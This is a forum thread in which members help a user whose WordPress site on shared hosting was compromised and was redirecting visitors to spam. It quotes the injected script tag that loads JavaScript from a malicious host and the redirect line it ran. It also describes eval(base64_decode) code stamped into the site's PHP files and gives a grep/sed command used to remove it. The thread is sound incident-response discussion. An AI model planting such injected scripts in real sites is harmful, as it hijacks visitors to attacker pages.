Website redirect-spamsite

Henning

Henning

Taxi to Parking
Gone West
Joined
Feb 26, 2005
Messages
39,463
Location
Ft Lauderdale FL
Display Name
Display name:
iHenning
A member just informed me that when he went to my site he was auto redirected to a spam site. I tried to reproduce it on the computers here at the house but cannot.

If anybody has a moment to click on www.caphenning.com and let me know if they get a redirect to a spam site, I'd appreciate as much info as you can give me.

Thanks.
 
It might be that someone's DNS settings were hijacked. might not be you.
 
Henning said:
Great, how the hell do I find it and get rid of it?
Click to expand...

Welcome to the joy's of a free shared hosting, this is squarely their fault, but now your problem. Looks like some kid ran a script that exploits the server. Some sysadmin has been asleep (what were you payin' him :wink2:?) because the exploit looks fairly dated. The clean up is fairly straightforward, but you won't have enough access to do it given your setup... What I would do is figure out how to backup your wp database and files and MOVE! I looked at your site, it's unaffected but who knows what apache is doing given they most likely modified httpd.conf.

Email on it's way.
 
Thanks, it looks like AFMU got hit, they seem to be the target of a lot of malice.
 
They've jacked with your site -- they're loading a malicious javascript file.

The very last line of your source on:
http://caphenning.com/
contains:
Code: 
<script src="[URL="http://www.pilotsofamerica.com/forum/view-source:http://waytur41noverse.rr.nu/pmg.php?d=x"]http://waytur41noverse.rr.nu/pmg.php?d=x[/URL]"></script>
You need to get this cleaned up. Complain to your host and go through your code looking for crap like that.

That code then loads
window.top.location.replace("http://sweepstakesandcontestsdo.com/n.php?h=1&s=pmg");
Click to expand...

Which redirects to spam.
 
Hmmm seems to only be picking on IE, that javascript doesn't seem to show up in Chrome at least. IE very much so.... What I'd be interested in is how they're doing it.
 
They're probably jacking with the PHP that is rendering your site. I'm sure they just slipped some EvilCode(tm) into the Wordpress code.
 
bartmc said:
Hmmm seems to only be picking on IE, that javascript doesn't seem to show up in Chrome at least. IE very much so.... What I'd be interested in is how they're doing it.
Click to expand...

Does show up on Firefox 11.0 Haven't had time to update to FF 12.0

On the other hand, FF blasts a warning to me about malicious site, so it's easy to "Get me Out of HERE!"
 
Firefox says nothing at all to me about it, perhaps AVG or one of the other filters I use is blocking it?
 
Or they might not be spitting it out on certain user agents. View your source. Look at the very bottom. Do you see what I posted above?

There is something in the PHP which dynamically builds the HTML your browser receives that is doing this.

Anyways..who setup this wordpress for you? Have you been applying security updates to it?
 
im in there, some base64_decode() goodness added to all his .php files --- cleaning up.
 
Just tried it from my iPad... I see a quick glimpse of a large boat at a dock, then I land at bing.com/11f
 
jesse said:
Or they might not be spitting it out on certain user agents. View your source. Look at the very bottom. Do you see what I posted above?

There is something in the PHP which dynamically builds the HTML your browser receives that is doing this.

Anyways..who setup this wordpress for you? Have you been applying security updates to it?
Click to expand...

That would be me, he's on a free hosting provider that installs wp via cPanel, I left the keys with him after the install.
 
jesse said:
Or they might not be spitting it out on certain user agents. View your source. Look at the very bottom. Do you see what I posted above?

There is something in the PHP which dynamically builds the HTML your browser receives that is doing this.

Anyways..who setup this wordpress for you? Have you been applying security updates to it?
Click to expand...

I did with some help here. I apply all security updates as they come. In fact, it appears that this one came the last time I updated about a week ago.
 
Appears to be something more nefarious than a wordpress issue, every php file in his account has been stampped with a malicious code....
 
bartmc said:
Appears to be something more nefarious than a wordpress issue, every php file in his directory has been stampped with a malicious code....
Click to expand...


I did a quick google on it and it appears they hit the entire host, after what happened in December taking them down completely for 2 weeks, I'm doubting this is a kids prank.
 
bartmc said:
Appears to be something more nefarious than a wordpress issue, every php file in his account has been stampped with a malicious code....
Click to expand...

Sounds like the permissions were too liberal on files they didn't need to be. Most likey they were 777 and another user blasted them with some code running under a shared apache user. Better permission setting would have stopped that.
 
Just blow the Wordpress install away and reinstall on a better host and migrate the db.
 
jesse said:
Sounds like the permissions were too liberal on files they didn't need to be. Most likey they were 777 and another user blasted them with some code running under a shared apache user. Better permission setting would have stopped that.
Click to expand...

They weren't 777 if FileZilla is reporting them correctly i'm seeing 755 as the most liberal permission on anything. No shell access and the word press install was done from one of those "Application Vault" things in a cPanel so the provider should have dialed those in correctly. Not entirely sure it was a wordpress breach, whatever done it stamped every file with a .php extension with some nasty base64_encoded() stuff. Luckily, it was regex-able. I downloaded all his *.php files ran

grep -lr --include=*.php "eval(base64_decode" . | xargs sed -i.bak 's/<?php \/\*\*\/ eval(base64_decode[^;]*;?>/\n/g

on them and ftped them all back on the server and it appears to have fixed it.
no .htaccess nastiness that I could find.... I'd want to know how they done it though. I didn't see anything in the logs and I'm not ready to blame WP just yet.
 
I see complaints from other AFMU users using other than WP, apparently this is the hack that brought the whole system down in December and they were down a long time redoing things. That this appeared last week is more than disconcerting.
 
bartmc said:
They weren't 777 if FileZilla is reporting them correctly i'm seeing 755 as the most liberal permission on anything. No shell access and the word press install was done from one of those "Application Vault" things in a cPanel so the provider should have dialed those in correctly. Not entirely sure it was a wordpress breach, whatever done it stamped every file with a .php extension with some nasty base64_encoded() stuff. Luckily, it was regex-able. I downloaded all his *.php files ran

grep -lr --include=*.php "eval(base64_decode" . | xargs sed -i.bak 's/<?php \/\*\*\/ eval(base64_decode[^;]*;?>/\n/g

on them and ftped them all back on the server and it appears to have fixed it.
no .htaccess nastiness that I could find.... I'd want to know how they done it though. I didn't see anything in the logs and I'm not ready to blame WP just yet.
Click to expand...

Yeah, that's what I would have done, too. ;)
 
Henning said:
I see complaints from other AFMU users using other than WP, apparently this is the hack that brought the whole system down in December and they were down a long time redoing things. That this appeared last week is more than disconcerting.
Click to expand...

I was just going by timestamps, Websense already has you blocked, you'll probably need to beg them to unblock you now, I dunno how they operate I recently bought a domain that had expired but was previously blocked by websense, emails seem to go to a black hole. That root.htm file was dated december so it could have been another hack or this one just went undetected for a while, it was only issuing the "badness" to internet explorer from what I could tell which might have prevented crawlers from figuring it out. Doesn't seem that google has you flagged.... that's good.
 
Last edited:
SCCutler said:
Yeah, that's what I would have done, too. ;)
Click to expand...

That's actually an easy one, the hacker could have been a little more creative, and made it hell to fix 900 and something files, at least harder than one (well technically 3) commands.

I haven't used sed in a while, stuff like this is good for keeping you on your toes.
 
Works fine from the iPad. I'll try later with IE8 from the PC.
 
bartmc said:
They weren't 777 if FileZilla is reporting them correctly i'm seeing 755 as the most liberal permission on anything. No shell access and the word press install was done from one of those "Application Vault" things in a cPanel so the provider should have dialed those in correctly. Not entirely sure it was a wordpress breach, whatever done it stamped every file with a .php extension with some nasty base64_encoded() stuff. Luckily, it was regex-able. I downloaded all his *.php files ran

grep -lr --include=*.php "eval(base64_decode" . | xargs sed -i.bak 's/<?php \/\*\*\/ eval(base64_decode[^;]*;?>/\n/g

on them and ftped them all back on the server and it appears to have fixed it.
no .htaccess nastiness that I could find.... I'd want to know how they done it though. I didn't see anything in the logs and I'm not ready to blame WP just yet.
Click to expand...
Well then most likely the entire server was compromised at the root level.
 
Henning said:
It was, it was knocked out in Dec.
Click to expand...
Any chance this latest mayhem is the result of an "innocent" file restore from a backup created after the hack occurred and before it was exorcized?
 
gismo said:
Any chance this latest mayhem is the result of an "innocent" file restore from a backup created after the hack occurred and before it was exorcized?
Click to expand...

LOL, you are asking the wrong M-F-r on that one. By the time all this crap entered the computer world I was over my curiosity on how it works, I just use the crap, when it goes wrong I ask for help.
 
Henning said:
LOL, you are asking the wrong M-F-r on that one. By the time all this crap entered the computer world I was over my curiosity on how it works, I just use the crap, when it goes wrong I ask for help.
Click to expand...

Did you update your DNS (Nameservers) yet?
 
You must log in or register to reply here.
Back
Top